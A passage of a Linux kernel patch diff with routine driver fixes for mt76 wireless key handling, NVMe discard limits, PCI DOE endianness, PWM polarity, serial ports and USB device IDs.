+@@ -455,20 +455,20 @@ int mt76x02_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 	msta = sta ? (struct mt76x02_sta *)sta->drv_priv : NULL;
+ 	wcid = msta ? &msta->wcid : &mvif->group_wcid;
+ 
+-	if (cmd == SET_KEY) {
+-		key->hw_key_idx = wcid->idx;
+-		wcid->hw_key_idx = idx;
+-		if (key->flags & IEEE80211_KEY_FLAG_RX_MGMT) {
+-			key->flags |= IEEE80211_KEY_FLAG_SW_MGMT_TX;
+-			wcid->sw_iv = true;
+-		}
+-	} else {
++	if (cmd != SET_KEY) {
+ 		if (idx == wcid->hw_key_idx) {
+ 			wcid->hw_key_idx = -1;
+ 			wcid->sw_iv = false;
+ 		}
+ 
+-		key = NULL;
++		return 0;
++	}
++
++	key->hw_key_idx = wcid->idx;
++	wcid->hw_key_idx = idx;
++	if (key->flags & IEEE80211_KEY_FLAG_RX_MGMT) {
++		key->flags |= IEEE80211_KEY_FLAG_SW_MGMT_TX;
++		wcid->sw_iv = true;
+ 	}
+ 	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/main.c b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+index 7589af4b3dab7..06c1045177e24 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+@@ -410,16 +410,15 @@ static int mt7915_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 		mt7915_mcu_add_bss_info(phy, vif, true);
+ 	}
+ 
+-	if (cmd == SET_KEY)
++	if (cmd == SET_KEY) {
+ 		*wcid_keyidx = idx;
+-	else if (idx == *wcid_keyidx)
+-		*wcid_keyidx = -1;
+-	else
++	} else {
++		if (idx == *wcid_keyidx)
++			*wcid_keyidx = -1;
+ 		goto out;
++	}
+ 
+-	mt76_wcid_key_setup(&dev->mt76, wcid,
+-			    cmd == SET_KEY ? key : NULL);
+-
++	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 	err = mt76_connac_mcu_add_key(&dev->mt76, vif, &msta->bip,
+ 				      key, MCU_EXT_CMD(STA_REC_UPDATE),
+ 				      &msta->wcid, cmd);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/main.c b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+index cdb0d61903935..744382be36f8b 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+@@ -569,16 +569,15 @@ static int mt7921_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 
+ 	mt7921_mutex_acquire(dev);
+ 
+-	if (cmd == SET_KEY)
++	if (cmd == SET_KEY) {
+ 		*wcid_keyidx = idx;
+-	else if (idx == *wcid_keyidx)
+-		*wcid_keyidx = -1;
+-	else
++	} else {
++		if (idx == *wcid_keyidx)
++			*wcid_keyidx = -1;
+ 		goto out;
++	}
+ 
+-	mt76_wcid_key_setup(&dev->mt76, wcid,
+-			    cmd == SET_KEY ? key : NULL);
+-
++	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 	err = mt76_connac_mcu_add_key(&dev->mt76, vif, &msta->bip,
+ 				      key, MCU_UNI_CMD(STA_REC_UPDATE),
+ 				      &msta->wcid, cmd);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/pci.c b/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
+index cb72ded372564..5c23c827abe47 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
+@@ -20,7 +20,7 @@ static const struct pci_device_id mt7921_pci_device_table[] = {
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_MEDIATEK, 0x0608),
+ 		.driver_data = (kernel_ulong_t)MT7921_FIRMWARE_WM },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_MEDIATEK, 0x0616),
+-		.driver_data = (kernel_ulong_t)MT7921_FIRMWARE_WM },
++		.driver_data = (kernel_ulong_t)MT7922_FIRMWARE_WM },
+ 	{ },
+ };
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/main.c b/drivers/net/wireless/mediatek/mt76/mt7996/main.c
+index c423b052e4f4c..2734aae5449b1 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/main.c
+@@ -351,16 +351,15 @@ static int mt7996_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 		mt7996_mcu_add_bss_info(phy, vif, true);
+ 	}
+ 
+-	if (cmd == SET_KEY)
++	if (cmd == SET_KEY) {
+ 		*wcid_keyidx = idx;
+-	else if (idx == *wcid_keyidx)
+-		*wcid_keyidx = -1;
+-	else
++	} else {
++		if (idx == *wcid_keyidx)
++			*wcid_keyidx = -1;
+ 		goto out;
++	}
+ 
+-	mt76_wcid_key_setup(&dev->mt76, wcid,
+-			    cmd == SET_KEY ? key : NULL);
+-
++	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 	err = mt7996_mcu_add_key(&dev->mt76, vif, &msta->bip,
+ 				 key, MCU_WMWA_UNI_CMD(STA_REC_UPDATE),
+ 				 &msta->wcid, cmd);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 70b5e891f6b3b..ee1b075d12cfc 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -1717,6 +1717,9 @@ static void nvme_config_discard(struct gendisk *disk, struct nvme_ns *ns)
+ 	struct request_queue *queue = disk->queue;
+ 	u32 size = queue_logical_block_size(queue);
+ 
++	if (ctrl->dmrsl && ctrl->dmrsl <= nvme_sect_to_lba(ns, UINT_MAX))
++		ctrl->max_discard_sectors = nvme_lba_to_sect(ns, ctrl->dmrsl);
++
+ 	if (ctrl->max_discard_sectors == 0) {
+ 		blk_queue_max_discard_sectors(queue, 0);
+ 		return;
+@@ -1731,9 +1734,6 @@ static void nvme_config_discard(struct gendisk *disk, struct nvme_ns *ns)
+ 	if (queue->limits.max_discard_sectors)
+ 		return;
+ 
+-	if (ctrl->dmrsl && ctrl->dmrsl <= nvme_sect_to_lba(ns, UINT_MAX))
+-		ctrl->max_discard_sectors = nvme_lba_to_sect(ns, ctrl->dmrsl);
+-
+ 	blk_queue_max_discard_sectors(queue, ctrl->max_discard_sectors);
+ 	blk_queue_max_discard_segments(queue, ctrl->max_discard_segments);
+ 
+diff --git a/drivers/pci/doe.c b/drivers/pci/doe.c
+index 66d9ab2886468..e5e9b287b9766 100644
+--- a/drivers/pci/doe.c
++++ b/drivers/pci/doe.c
+@@ -128,7 +128,7 @@ static int pci_doe_send_req(struct pci_doe_mb *doe_mb,
+ 		return -EIO;
+ 
+ 	/* Length is 2 DW of header + length of payload in DW */
+-	length = 2 + task->request_pl_sz / sizeof(u32);
++	length = 2 + task->request_pl_sz / sizeof(__le32);
+ 	if (length > PCI_DOE_MAX_LENGTH)
+ 		return -EIO;
+ 	if (length == PCI_DOE_MAX_LENGTH)
+@@ -141,9 +141,9 @@ static int pci_doe_send_req(struct pci_doe_mb *doe_mb,
+ 	pci_write_config_dword(pdev, offset + PCI_DOE_WRITE,
+ 			       FIELD_PREP(PCI_DOE_DATA_OBJECT_HEADER_2_LENGTH,
+ 					  length));
+-	for (i = 0; i < task->request_pl_sz / sizeof(u32); i++)
++	for (i = 0; i < task->request_pl_sz / sizeof(__le32); i++)
+ 		pci_write_config_dword(pdev, offset + PCI_DOE_WRITE,
+-				       task->request_pl[i]);
++				       le32_to_cpu(task->request_pl[i]));
+ 
+ 	pci_doe_write_ctrl(doe_mb, PCI_DOE_CTRL_GO);
+ 
+@@ -195,11 +195,11 @@ static int pci_doe_recv_resp(struct pci_doe_mb *doe_mb, struct pci_doe_task *tas
+ 
+ 	/* First 2 dwords have already been read */
+ 	length -= 2;
+-	payload_length = min(length, task->response_pl_sz / sizeof(u32));
++	payload_length = min(length, task->response_pl_sz / sizeof(__le32));
+ 	/* Read the rest of the response payload */
+ 	for (i = 0; i < payload_length; i++) {
+-		pci_read_config_dword(pdev, offset + PCI_DOE_READ,
+-				      &task->response_pl[i]);
++		pci_read_config_dword(pdev, offset + PCI_DOE_READ, &val);
++		task->response_pl[i] = cpu_to_le32(val);
+ 		/* Prior to the last ack, ensure Data Object Ready */
+ 		if (i == (payload_length - 1) && !pci_doe_data_obj_ready(doe_mb))
+ 			return -EIO;
+@@ -217,13 +217,14 @@ static int pci_doe_recv_resp(struct pci_doe_mb *doe_mb, struct pci_doe_task *tas
+ 	if (FIELD_GET(PCI_DOE_STATUS_ERROR, val))
+ 		return -EIO;
+ 
+-	return min(length, task->response_pl_sz / sizeof(u32)) * sizeof(u32);
++	return min(length, task->response_pl_sz / sizeof(__le32)) * sizeof(__le32);
+ }
+ 
+ static void signal_task_complete(struct pci_doe_task *task, int rv)
+ {
+ 	task->rv = rv;
+ 	task->complete(task);
++	destroy_work_on_stack(&task->work);
+ }
+ 
+ static void signal_task_abort(struct pci_doe_task *task, int rv)
+@@ -317,14 +318,16 @@ static int pci_doe_discovery(struct pci_doe_mb *doe_mb, u8 *index, u16 *vid,
+ {
+ 	u32 request_pl = FIELD_PREP(PCI_DOE_DATA_OBJECT_DISC_REQ_3_INDEX,
+ 				    *index);
++	__le32 request_pl_le = cpu_to_le32(request_pl);
++	__le32 response_pl_le;
+ 	u32 response_pl;
+ 	DECLARE_COMPLETION_ONSTACK(c);
+ 	struct pci_doe_task task = {
+ 		.prot.vid = PCI_VENDOR_ID_PCI_SIG,
+ 		.prot.type = PCI_DOE_PROTOCOL_DISCOVERY,
+-		.request_pl = &request_pl,
++		.request_pl = &request_pl_le,
+ 		.request_pl_sz = sizeof(request_pl),
+-		.response_pl = &response_pl,
++		.response_pl = &response_pl_le,
+ 		.response_pl_sz = sizeof(response_pl),
+ 		.complete = pci_doe_task_complete,
+ 		.private = &c,
+@@ -340,6 +343,7 @@ static int pci_doe_discovery(struct pci_doe_mb *doe_mb, u8 *index, u16 *vid,
+ 	if (task.rv != sizeof(response_pl))
+ 		return -EIO;
+ 
++	response_pl = le32_to_cpu(response_pl_le);
+ 	*vid = FIELD_GET(PCI_DOE_DATA_OBJECT_DISC_RSP_3_VID, response_pl);
+ 	*protocol = FIELD_GET(PCI_DOE_DATA_OBJECT_DISC_RSP_3_PROTOCOL,
+ 			      response_pl);
+@@ -520,6 +524,8 @@ EXPORT_SYMBOL_GPL(pci_doe_supports_prot);
+  * task->complete will be called when the state machine is done processing this
+  * task.
+  *
++ * @task must be allocated on the stack.
++ *
+  * Excess data will be discarded.
+  *
+  * RETURNS: 0 when task has been successfully queued, -ERRNO on error
+@@ -533,15 +539,15 @@ int pci_doe_submit_task(struct pci_doe_mb *doe_mb, struct pci_doe_task *task)
+ 	 * DOE requests must be a whole number of DW and the response needs to
+ 	 * be big enough for at least 1 DW
+ 	 */
+-	if (task->request_pl_sz % sizeof(u32) ||
+-	    task->response_pl_sz < sizeof(u32))
++	if (task->request_pl_sz % sizeof(__le32) ||
++	    task->response_pl_sz < sizeof(__le32))
+ 		return -EINVAL;
+ 
+ 	if (test_bit(PCI_DOE_FLAG_DEAD, &doe_mb->flags))
+ 		return -EIO;
+ 
+ 	task->doe_mb = doe_mb;
+-	INIT_WORK(&task->work, doe_statemachine_work);
++	INIT_WORK_ONSTACK(&task->work, doe_statemachine_work);
+ 	queue_work(doe_mb->work_queue, &task->work);
+ 	return 0;
+ }
+diff --git a/drivers/platform/x86/think-lmi.c b/drivers/platform/x86/think-lmi.c
+index 74af3e593b2ca..336b9029d1515 100644
+--- a/drivers/platform/x86/think-lmi.c
++++ b/drivers/platform/x86/think-lmi.c
+@@ -920,7 +920,7 @@ static ssize_t display_name_show(struct kobject *kobj, struct kobj_attribute *at
+ static ssize_t current_value_show(struct kobject *kobj, struct kobj_attribute *attr, char *buf)
+ {
+ 	struct tlmi_attr_setting *setting = to_tlmi_attr_setting(kobj);
+-	char *item, *value;
++	char *item, *value, *p;
+ 	int ret;
+ 
+ 	ret = tlmi_setting(setting->index, &item, LENOVO_BIOS_SETTING_GUID);
+@@ -930,10 +930,15 @@ static ssize_t current_value_show(struct kobject *kobj, struct kobj_attribute *a
+ 	/* validate and split from `item,value` -> `value` */
+ 	value = strpbrk(item, ",");
+ 	if (!value || value == item || !strlen(value + 1))
+-		return -EINVAL;
+-
+-	ret = sysfs_emit(buf, "%s\n", value + 1);
++		ret = -EINVAL;
++	else {
++		/* On Workstations remove the Options part after the value */
++		p = strchrnul(value, ';');
++		*p = '\0';
++		ret = sysfs_emit(buf, "%s\n", value + 1);
++	}
+ 	kfree(item);
++
+ 	return ret;
+ }
+ 
+@@ -1457,10 +1462,10 @@ static int tlmi_analyze(void)
+ 			 * name string.
+ 			 * Try and pull that out if it's available.
+ 			 */
+-			char *item, *optstart, *optend;
++			char *optitem, *optstart, *optend;
+ 
+-			if (!tlmi_setting(setting->index, &item, LENOVO_BIOS_SETTING_GUID)) {
+-				optstart = strstr(item, "[Optional:");
++			if (!tlmi_setting(setting->index, &optitem, LENOVO_BIOS_SETTING_GUID)) {
++				optstart = strstr(optitem, "[Optional:");
+ 				if (optstart) {
+ 					optstart += strlen("[Optional:");
+ 					optend = strstr(optstart, "]");
+@@ -1469,6 +1474,7 @@ static int tlmi_analyze(void)
+ 							kstrndup(optstart, optend - optstart,
+ 									GFP_KERNEL);
+ 				}
++				kfree(optitem);
+ 			}
+ 		}
+ 		/*
+diff --git a/drivers/pwm/pwm-cros-ec.c b/drivers/pwm/pwm-cros-ec.c
+index 86df6702cb835..ad18b0ebe3f1e 100644
+--- a/drivers/pwm/pwm-cros-ec.c
++++ b/drivers/pwm/pwm-cros-ec.c
+@@ -198,6 +198,7 @@ static int cros_ec_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	state->enabled = (ret > 0);
+ 	state->period = EC_PWM_MAX_DUTY;
++	state->polarity = PWM_POLARITY_NORMAL;
+ 
+ 	/*
+ 	 * Note that "disabled" and "duty cycle == 0" are treated the same. If
+diff --git a/drivers/pwm/pwm-hibvt.c b/drivers/pwm/pwm-hibvt.c
+index 12c05c155cab0..1b9274c5ad872 100644
+--- a/drivers/pwm/pwm-hibvt.c
++++ b/drivers/pwm/pwm-hibvt.c
+@@ -146,6 +146,7 @@ static int hibvt_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	value = readl(base + PWM_CTRL_ADDR(pwm->hwpwm));
+ 	state->enabled = (PWM_ENABLE_MASK & value);
++	state->polarity = (PWM_POLARITY_MASK & value) ? PWM_POLARITY_INVERSED : PWM_POLARITY_NORMAL;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/pwm/pwm-iqs620a.c b/drivers/pwm/pwm-iqs620a.c
+index 4987ca940b648..01208c2f58843 100644
+--- a/drivers/pwm/pwm-iqs620a.c
++++ b/drivers/pwm/pwm-iqs620a.c
+@@ -126,6 +126,7 @@ static int iqs620_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	mutex_unlock(&iqs620_pwm->lock);
+ 
+ 	state->period = IQS620_PWM_PERIOD_NS;
++	state->polarity = PWM_POLARITY_NORMAL;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/pwm/pwm-meson.c b/drivers/pwm/pwm-meson.c
+index 16d79ca5d8f53..5cd7b90872c62 100644
+--- a/drivers/pwm/pwm-meson.c
++++ b/drivers/pwm/pwm-meson.c
+@@ -162,6 +162,12 @@ static int meson_pwm_calc(struct meson_pwm *meson, struct pwm_device *pwm,
+ 	duty = state->duty_cycle;
+ 	period = state->period;
+ 
++	/*
++	 * Note this is wrong. The result is an output wave that isn't really
++	 * inverted and so is wrongly identified by .get_state as normal.
++	 * Fixing this needs some care however as some machines might rely on
++	 * this.
++	 */
+ 	if (state->polarity == PWM_POLARITY_INVERSED)
+ 		duty = period - duty;
+ 
+@@ -358,6 +364,8 @@ static int meson_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		state->duty_cycle = 0;
+ 	}
+ 
++	state->polarity = PWM_POLARITY_NORMAL;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/pwm/pwm-sprd.c b/drivers/pwm/pwm-sprd.c
+index d866ce345f977..bde579a338c27 100644
+--- a/drivers/pwm/pwm-sprd.c
++++ b/drivers/pwm/pwm-sprd.c
+@@ -109,6 +109,7 @@ static int sprd_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	duty = val & SPRD_PWM_DUTY_MSK;
+ 	tmp = (prescale + 1) * NSEC_PER_SEC * duty;
+ 	state->duty_cycle = DIV_ROUND_CLOSEST_ULL(tmp, chn->clk_rate);
++	state->polarity = PWM_POLARITY_NORMAL;
+ 
+ 	/* Disable PWM clocks if the PWM channel is not in enable state. */
+ 	if (!state->enabled)
+diff --git a/drivers/scsi/iscsi_tcp.c b/drivers/scsi/iscsi_tcp.c
+index 0454d94e8cf0d..e7a6fc01d9ca8 100644
+--- a/drivers/scsi/iscsi_tcp.c
++++ b/drivers/scsi/iscsi_tcp.c
+@@ -768,13 +768,12 @@ static int iscsi_sw_tcp_conn_set_param(struct iscsi_cls_conn *cls_conn,
+ 		iscsi_set_param(cls_conn, param, buf, buflen);
+ 		break;
+ 	case ISCSI_PARAM_DATADGST_EN:
+-		iscsi_set_param(cls_conn, param, buf, buflen);
+-
+ 		mutex_lock(&tcp_sw_conn->sock_lock);
+ 		if (!tcp_sw_conn->sock) {
+ 			mutex_unlock(&tcp_sw_conn->sock_lock);
+ 			return -ENOTCONN;
+ 		}
++		iscsi_set_param(cls_conn, param, buf, buflen);
+ 		tcp_sw_conn->sendpage = conn->datadgst_en ?
+ 			sock_no_sendpage : tcp_sw_conn->sock->ops->sendpage;
+ 		mutex_unlock(&tcp_sw_conn->sock_lock);
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 02913cc75195b..901c5c8035ef2 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -3607,6 +3607,7 @@ skip_dpc:
+ probe_failed:
+ 	qla_enode_stop(base_vha);
+ 	qla_edb_stop(base_vha);
++	vfree(base_vha->scan.l);
+ 	if (base_vha->gnl.l) {
+ 		dma_free_coherent(&ha->pdev->dev, base_vha->gnl.size,
+ 				base_vha->gnl.l, base_vha->gnl.ldma);
+diff --git a/drivers/tty/serial/8250/8250_port.c b/drivers/tty/serial/8250/8250_port.c
+index beba8f38b3dcb..d006467ec7843 100644
+--- a/drivers/tty/serial/8250/8250_port.c
++++ b/drivers/tty/serial/8250/8250_port.c
+@@ -1896,6 +1896,17 @@ EXPORT_SYMBOL_GPL(serial8250_modem_status);
+ static bool handle_rx_dma(struct uart_8250_port *up, unsigned int iir)
+ {
+ 	switch (iir & 0x3f) {
++	case UART_IIR_THRI:
++		/*
++		 * Postpone DMA or not decision to IIR_RDI or IIR_RX_TIMEOUT
++		 * because it's impossible to do an informed decision about
++		 * that with IIR_THRI.
++		 *
++		 * This also fixes one known DMA Rx corruption issue where
++		 * DR is asserted but DMA Rx only gets a corrupted zero byte
++		 * (too early DR?).
++		 */
++		return false;
+ 	case UART_IIR_RDI:
+ 		if (!up->dma->rx_running)
+ 			break;
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 812216b24db81..59c10bceebbef 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -832,11 +832,17 @@ static unsigned int lpuart32_tx_empty(struct uart_port *port)
+ 			struct lpuart_port, port);
+ 	unsigned long stat = lpuart32_read(port, UARTSTAT);
+ 	unsigned long sfifo = lpuart32_read(port, UARTFIFO);
++	unsigned long ctrl = lpuart32_read(port, UARTCTRL);
+ 
+ 	if (sport->dma_tx_in_progress)
+ 		return 0;
+ 
+-	if (stat & UARTSTAT_TC && sfifo & UARTFIFO_TXEMPT)
++	/*
++	 * LPUART Transmission Complete Flag may never be set while queuing a break
++	 * character, so avoid checking for transmission complete when UARTCTRL_SBK
++	 * is asserted.
++	 */
++	if ((stat & UARTSTAT_TC && sfifo & UARTFIFO_TXEMPT) || ctrl & UARTCTRL_SBK)
+ 		return TIOCSER_TEMT;
+ 
+ 	return 0;
+@@ -2890,7 +2896,7 @@ static bool lpuart_uport_is_active(struct lpuart_port *sport)
+ 	tty = tty_port_tty_get(port);
+ 	if (tty) {
+ 		tty_dev = tty->dev;
+-		may_wake = device_may_wakeup(tty_dev);
++		may_wake = tty_dev && device_may_wakeup(tty_dev);
+ 		tty_kref_put(tty);
+ 	}
+ 
+diff --git a/drivers/tty/serial/sh-sci.c b/drivers/tty/serial/sh-sci.c
+index 7bd0807209299..caa09a0c48f45 100644
+--- a/drivers/tty/serial/sh-sci.c
++++ b/drivers/tty/serial/sh-sci.c
+@@ -31,6 +31,7 @@
+ #include <linux/ioport.h>
+ #include <linux/ktime.h>
+ #include <linux/major.h>
++#include <linux/minmax.h>
+ #include <linux/module.h>
+ #include <linux/mm.h>
+ #include <linux/of.h>
+@@ -2864,6 +2865,13 @@ static int sci_init_single(struct platform_device *dev,
+ 			sci_port->irqs[i] = platform_get_irq(dev, i);
+ 	}
+ 
++	/*
++	 * The fourth interrupt on SCI port is transmit end interrupt, so
++	 * shuffle the interrupts.
++	 */
++	if (p->type == PORT_SCI)
++		swap(sci_port->irqs[SCIx_BRI_IRQ], sci_port->irqs[SCIx_TEI_IRQ]);
++
+ 	/* The SCI generates several interrupts. They can be muxed together or
+ 	 * connected to different interrupt lines. In the muxed case only one
+ 	 * interrupt resource is specified as there is only one interrupt ID.
+@@ -2929,7 +2937,7 @@ static int sci_init_single(struct platform_device *dev,
+ 	port->flags		= UPF_FIXED_PORT | UPF_BOOT_AUTOCONF | p->flags;
+ 	port->fifosize		= sci_port->params->fifosize;
+ 
+-	if (port->type == PORT_SCI) {
++	if (port->type == PORT_SCI && !dev->dev.of_node) {
+ 		if (sci_port->reg_size >= 0x20)
+ 			port->regshift = 2;
+ 		else
+diff --git a/drivers/usb/cdns3/cdnsp-ep0.c b/drivers/usb/cdns3/cdnsp-ep0.c
+index d63d5d92f2554..f317d3c847810 100644
+--- a/drivers/usb/cdns3/cdnsp-ep0.c
++++ b/drivers/usb/cdns3/cdnsp-ep0.c
+@@ -414,7 +414,7 @@ static int cdnsp_ep0_std_request(struct cdnsp_device *pdev,
+ void cdnsp_setup_analyze(struct cdnsp_device *pdev)
+ {
+ 	struct usb_ctrlrequest *ctrl = &pdev->setup;
+-	int ret = 0;
++	int ret = -EINVAL;
+ 	u16 len;
+ 
+ 	trace_cdnsp_ctrl_req(ctrl);
+@@ -424,7 +424,6 @@ void cdnsp_setup_analyze(struct cdnsp_device *pdev)
+ 
+ 	if (pdev->gadget.state == USB_STATE_NOTATTACHED) {
+ 		dev_err(pdev->dev, "ERR: Setup detected in unattached state\n");
+-		ret = -EINVAL;
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/usb/dwc3/dwc3-pci.c b/drivers/usb/dwc3/dwc3-pci.c
+index a23ddbb819795..560793545362a 100644
+--- a/drivers/usb/dwc3/dwc3-pci.c
++++ b/drivers/usb/dwc3/dwc3-pci.c
+@@ -49,6 +49,7 @@
+ #define PCI_DEVICE_ID_INTEL_RPLS		0x7a61
+ #define PCI_DEVICE_ID_INTEL_MTLM		0x7eb1
+ #define PCI_DEVICE_ID_INTEL_MTLP		0x7ec1
++#define PCI_DEVICE_ID_INTEL_MTLS		0x7f6f
+ #define PCI_DEVICE_ID_INTEL_MTL			0x7e7e
+ #define PCI_DEVICE_ID_INTEL_TGL			0x9a15
+ #define PCI_DEVICE_ID_AMD_MR			0x163a
+@@ -474,6 +475,9 @@ static const struct pci_device_id dwc3_pci_id_table[] = {
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTLP),
+ 	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
+ 
++	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTLS),
++	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
++
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTL),
+ 	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
+ 
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index fb988e4ea9244..6db07ca419c31 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -771,12 +771,11 @@ static struct pci_driver xhci_pci_driver = {
+ 	/* suspend and resume implemented later */
+ 
+ 	.shutdown = 	usb_hcd_pci_shutdown,
+-	.driver = {
+ #ifdef CONFIG_PM
+-		.pm = &usb_hcd_pci_pm_ops,
+-#endif
+-		.probe_type = PROBE_PREFER_ASYNCHRONOUS,
++	.driver = {
++		.pm = &usb_hcd_pci_pm_ops
+ 	},
++#endif
+ };
+ 
+ static int __init xhci_pci_init(void)
+diff --git a/drivers/usb/host/xhci-tegra.c b/drivers/usb/host/xhci-tegra.c
+index bdb776553826b..32df571bb2339 100644
+--- a/drivers/usb/host/xhci-tegra.c
++++ b/drivers/usb/host/xhci-tegra.c
+@@ -1225,6 +1225,9 @@ static void tegra_xhci_id_work(struct work_struct *work)
+ 
+ 	mutex_unlock(&tegra->lock);
+ 
++	tegra->otg_usb3_port = tegra_xusb_padctl_get_usb3_companion(tegra->padctl,
++								    tegra->otg_usb2_port);
++
+ 	if (tegra->host_mode) {
+ 		/* switch to host mode */
+ 		if (tegra->otg_usb3_port >= 0) {
+@@ -1339,9 +1342,6 @@ static int tegra_xhci_id_notify(struct notifier_block *nb,
+ 	}
+ 
+ 	tegra->otg_usb2_port = tegra_xusb_get_usb2_port(tegra, usbphy);
+-	tegra->otg_usb3_port = tegra_xusb_padctl_get_usb3_companion(
+-							tegra->padctl,
+-							tegra->otg_usb2_port);
+ 
+ 	tegra->host_mode = (usbphy->last_event == USB_EVENT_ID) ? true : false;
+ 
+diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c
+index 2b280beb00115..c02ad4f76bb3c 100644
+--- a/drivers/usb/host/xhci.c
++++ b/drivers/usb/host/xhci.c
+@@ -9,6 +9,7 @@
+  */
+ 
+ #include <linux/pci.h>
++#include <linux/iommu.h>
+ #include <linux/iopoll.h>
+ #include <linux/irq.h>
+ #include <linux/log2.h>
+@@ -228,6 +229,7 @@ int xhci_reset(struct xhci_hcd *xhci, u64 timeout_us)
+ static void xhci_zero_64b_regs(struct xhci_hcd *xhci)
+ {
+ 	struct device *dev = xhci_to_hcd(xhci)->self.sysdev;
++	struct iommu_domain *domain;
+ 	int err, i;
+ 	u64 val;
+ 	u32 intrs;
+@@ -246,7 +248,9 @@ static void xhci_zero_64b_regs(struct xhci_hcd *xhci)
+ 	 * an iommu. Doing anything when there is no iommu is definitely
+ 	 * unsafe...
+ 	 */
+-	if (!(xhci->quirks & XHCI_ZERO_64B_REGS) || !device_iommu_mapped(dev))
++	domain = iommu_get_domain_for_dev(dev);
++	if (!(xhci->quirks & XHCI_ZERO_64B_REGS) || !domain ||
++	    domain->type == IOMMU_DOMAIN_IDENTITY)
+ 		return;
+ 
+ 	xhci_info(xhci, "Zeroing 64bit base registers, expecting fault\n");
+@@ -4406,6 +4410,7 @@ static int __maybe_unused xhci_change_max_exit_latency(struct xhci_hcd *xhci,
+ 
+ 	if (!virt_dev || max_exit_latency == virt_dev->current_mel) {
+ 		spin_unlock_irqrestore(&xhci->lock, flags);
++		xhci_free_command(xhci, command);
+ 		return 0;
+ 	}
+ 
+diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c
+index 832ad592b7ef3..cdea1bff3b708 100644
+--- a/drivers/usb/serial/cp210x.c
++++ b/drivers/usb/serial/cp210x.c
+@@ -120,6 +120,7 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(0x10C4, 0x826B) }, /* Cygnal Integrated Products, Inc., Fasttrax GPS demonstration module */
+ 	{ USB_DEVICE(0x10C4, 0x8281) }, /* Nanotec Plug & Drive */
+ 	{ USB_DEVICE(0x10C4, 0x8293) }, /* Telegesis ETRX2USB */
++	{ USB_DEVICE(0x10C4, 0x82AA) }, /* Silicon Labs IFS-USB-DATACABLE used with Quint UPS */
+ 	{ USB_DEVICE(0x10C4, 0x82EF) }, /* CESINEL FALCO 6105 AC Power Supply */
+ 	{ USB_DEVICE(0x10C4, 0x82F1) }, /* CESINEL MEDCAL EFD Earth Fault Detector */
+ 	{ USB_DEVICE(0x10C4, 0x82F2) }, /* CESINEL MEDCAL ST Network Analyzer */
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index e6d8d9b35ad0e..f31cc3c763299 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -1198,6 +1198,8 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0, 0) },
